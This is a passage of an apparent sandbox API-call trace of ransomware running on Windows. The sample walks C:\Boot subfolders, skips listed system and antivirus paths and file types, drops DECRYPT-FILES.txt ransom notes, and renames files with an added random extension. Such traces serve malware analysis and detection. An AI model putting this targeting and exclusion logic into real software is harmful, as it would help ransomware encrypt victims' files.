[0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0071.189] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0071.189] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0071.189] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0071.189] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0071.189] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0071.189] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0071.189] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0071.189] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0071.189] lstrcpyA (in: lpString1=0x3f2d960, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0071.189] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0071.189] lstrlenW (lpString="C:\\Boot\\BOOTSTAT.DAT") returned 20 [0071.190] wsprintfW (in: param_1=0x3f2e618, param_2="%s.%s" | out: param_1="C:\\Boot\\BOOTSTAT.DAT.oFY0") returned 25 [0071.190] MoveFileExW (lpExistingFileName="C:\\Boot\\BOOTSTAT.DAT" (normalized: "c:\\boot\\bootstat.dat"), lpNewFileName="C:\\Boot\\BOOTSTAT.DAT.oFY0" (normalized: "c:\\boot\\bootstat.dat.ofy0"), dwFlags=0x0) returned 1 [0071.190] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.190] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.191] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.191] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0071.191] lstrcmpW (lpString1="cs-CZ", lpString2=".") returned 1 [0071.191] lstrcmpW (lpString1="cs-CZ", lpString2="..") returned 1 [0071.191] lstrcatW (in: lpString1="cs-CZ", lpString2="\\" | out: lpString1="cs-CZ\\") returned="cs-CZ\\" [0071.191] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="cs-CZ\\" | out: lpString1="C:\\Boot\\cs-CZ\\") returned="C:\\Boot\\cs-CZ\\" [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Program Files") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch=":\\Windows") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Games\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\All Users") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="AhnLab") returned 0x0 [0071.191] StrStrW (lpFirst="C:\\Boot\\cs-CZ\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.192] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0071.192] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.192] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\cs-CZ\\\\jkbimi8.tmp") returned 26 [0071.192] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\\\jkbimi8.tmp" (normalized: "c:\\boot\\cs-cz\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.192] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0071.192] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.192] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\cs-CZ\\\\DECRYPT-FILES.txt") returned 32 [0071.192] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\cs-cz\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.193] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.193] CloseHandle (hObject=0x424) returned 1 [0071.194] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0071.194] lstrcatW (in: lpString1="C:\\Boot\\cs-CZ\\", lpString2="*" | out: lpString1="C:\\Boot\\cs-CZ\\*") returned="C:\\Boot\\cs-CZ\\*" [0071.194] FindFirstFileW (in: lpFileName="C:\\Boot\\cs-CZ\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.194] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.194] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.194] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.194] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.194] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.194] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.194] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.194] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.194] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.194] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.194] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.194] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0071.195] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.195] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\cs-CZ\\" | out: lpString1="C:\\Boot\\cs-CZ\\") returned="C:\\Boot\\cs-CZ\\" [0071.195] lstrcatW (in: lpString1="C:\\Boot\\cs-CZ\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" [0071.195] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.195] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.195] CloseHandle (hObject=0x0) returned 0 [0071.195] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.195] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a790a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.195] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.195] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a790a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.195] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.195] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.195] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.196] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.196] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.196] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.196] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.196] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.196] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.196] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.196] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.196] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.196] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.196] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.196] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.196] lstrlenW (lpString="C:\\Boot\\cs-CZ\\") returned 14 [0071.196] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.196] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\cs-CZ\\" | out: lpString1="C:\\Boot\\cs-CZ\\") returned="C:\\Boot\\cs-CZ\\" [0071.196] lstrcatW (in: lpString1="C:\\Boot\\cs-CZ\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Boot\\cs-CZ\\jkbimi8.tmp") returned="C:\\Boot\\cs-CZ\\jkbimi8.tmp" [0071.196] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.196] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\jkbimi8.tmp" (normalized: "c:\\boot\\cs-cz\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.196] CloseHandle (hObject=0x0) returned 0 [0071.196] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.197] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a790a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a790a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a790a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0071.197] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.197] CloseHandle (hObject=0x420) returned 1 [0071.197] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="da-DK", cAlternateFileName="")) returned 1 [0071.197] lstrcmpW (lpString1="da-DK", lpString2=".") returned 1 [0071.197] lstrcmpW (lpString1="da-DK", lpString2="..") returned 1 [0071.197] lstrcatW (in: lpString1="da-DK", lpString2="\\" | out: lpString1="da-DK\\") returned="da-DK\\" [0071.197] lstrcatW (in: lpString1="C:\\Boot\\", lpString2="da-DK\\" | out: lpString1="C:\\Boot\\da-DK\\") returned="C:\\Boot\\da-DK\\" [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Program Files") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch=":\\Windows") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Games\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Tor Browser\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\ProgramData\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\All Users") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\IETldCache\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\Local Settings\\") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="\\AppData\\Local") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="AhnLab") returned 0x0 [0071.197] StrStrW (lpFirst="C:\\Boot\\da-DK\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0071.197] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0071.197] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.197] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\da-DK\\\\jkbimi8.tmp") returned 26 [0071.197] CreateFileW (lpFileName="C:\\Boot\\da-DK\\\\jkbimi8.tmp" (normalized: "c:\\boot\\da-dk\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x420 [0071.198] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0071.198] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0071.198] wsprintfW (in: param_1=0x3f2ebac, param_2="%s\\%s" | out: param_1="C:\\Boot\\da-DK\\\\DECRYPT-FILES.txt") returned 32 [0071.198] CreateFileW (lpFileName="C:\\Boot\\da-DK\\\\DECRYPT-FILES.txt" (normalized: "c:\\boot\\da-dk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x424 [0071.198] WriteFile (in: hFile=0x424, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2eba8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2eba8*=0x23fc, lpOverlapped=0x0) returned 1 [0071.199] CloseHandle (hObject=0x424) returned 1 [0071.199] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0071.199] lstrcatW (in: lpString1="C:\\Boot\\da-DK\\", lpString2="*" | out: lpString1="C:\\Boot\\da-DK\\*") returned="C:\\Boot\\da-DK\\*" [0071.199] FindFirstFileW (in: lpFileName="C:\\Boot\\da-DK\\*", lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8c18 [0071.200] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.200] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0071.200] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.200] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.200] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="DECRYPT-FILES.txt") returned -1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="autorun.inf") returned 1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="boot.ini") returned 1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="desktop.ini") returned -1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat") returned -1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="iconcache.db") returned -1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="bootsect.bak") returned -1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="ntuser.dat.log") returned -1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="thumbs.db") returned -1 [0071.200] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Bootfont.bin") returned 1 [0071.200] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.200] lstrcmpiW (lpString1="mui", lpString2="lnk") returned 1 [0071.200] lstrcmpiW (lpString1="mui", lpString2="exe") returned 1 [0071.200] lstrcmpiW (lpString1="mui", lpString2="sys") returned -1 [0071.200] lstrcmpiW (lpString1="mui", lpString2="dll") returned 1 [0071.200] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0071.200] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0071.200] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\da-DK\\" | out: lpString1="C:\\Boot\\da-DK\\") returned="C:\\Boot\\da-DK\\" [0071.200] lstrcatW (in: lpString1="C:\\Boot\\da-DK\\", lpString2="bootmgr.exe.mui" | out: lpString1="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned="C:\\Boot\\da-DK\\bootmgr.exe.mui" [0071.200] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.201] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.202] CloseHandle (hObject=0x0) returned 0 [0071.202] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.202] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0071.202] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0071.202] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa6a9f200, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6a9f200, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6a9f200, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.202] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.202] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.202] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.202] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.202] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.202] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.202] lstrlenW (lpString="C:\\Boot\\da-DK\\") returned 14 [0071.202] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.202] lstrcpyW (in: lpString1=0x3f2eb9c, lpString2="C:\\Boot\\da-DK\\" | out: 